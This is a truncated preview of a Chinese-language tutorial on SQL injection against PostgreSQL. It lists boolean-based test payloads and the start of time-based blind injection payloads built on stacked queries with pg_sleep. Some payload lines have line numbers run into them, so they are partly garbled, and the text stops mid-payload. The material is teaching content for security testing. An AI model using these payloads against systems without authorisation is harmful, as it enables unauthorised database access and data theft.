关于PostgreSQL的SQL注入必知必会 .docVIP

挖洞的土拨鼠 我的GitHub: /cisp我的博客: /KevinGeorge/ 关于PostgreSQL的SQL注入必知必会 一、postgresql简介 postgresql是一款关系型数据库，广泛应用在web编程当中，由于其语法与MySQL不尽相同，所以其SQL注入又自成一派。 二、postgresql的SQL注入：（注意注释符号--+） 1、简单的有回显的SQL注入不用多说，还是基本的SQL语句直接查询就可以了。 1 #简单的payload2 parameter = 2-13 parameter = 1 and 1 = 24 parameter = 1 or 1 = 2-15 parameter = 1 and 1=1#and - or6 parameter = 1 and 1=2#and - or 或者引号区分发（适用于字符串） 1 parameter = 1 #Success2 parameter = 1 #Failed3 parameter = 1 #Success 2、一般的基于时间的盲注，可以参考下面的办法： 1 #postgresql 的几个简单判断payload：2 parameter=1;select pg_sleep(5)3 parameter=1;select pg_sleep(5)4 parameter=1);sele